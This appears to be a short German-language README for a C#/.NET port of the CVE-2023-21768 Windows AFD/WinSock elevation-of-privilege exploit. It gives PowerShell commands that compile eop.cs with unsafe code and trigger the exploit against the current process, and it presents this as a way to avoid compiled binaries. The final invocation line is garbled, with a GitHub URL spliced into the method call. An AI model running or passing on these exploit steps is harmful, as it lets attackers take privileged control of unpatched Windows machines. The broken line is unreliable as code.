
C# / .NET-Version von CVE-2023-21768
Dotnet / C#-Port des AFD-for-WinSock-EoP-Exploits
Referenzen:
Manchmal kann man keine kompilierten Binaries verwenden.
Führen Sie Folgendes in PowerShell aus.
$PWSH_PID = ([System.Diagnostics.Process]::GetCurrentProcess() | Select-Object -ExpandProperty ID)
echo "[*] Current powershell PID: $PWSH_PID"
echo "[+] Compiling EoP exploit"
Add-Type -Path eop.cs -CompilerOptions "-unsafe"
echo "[+] Triggering exploit"
[XOR.EoP]:https://raw.githubusercontent.com/xboxoneresearch/cve-2023-21768-dotnet/main/:Run($PWSH_PID)
echo "[+] Exploit finished"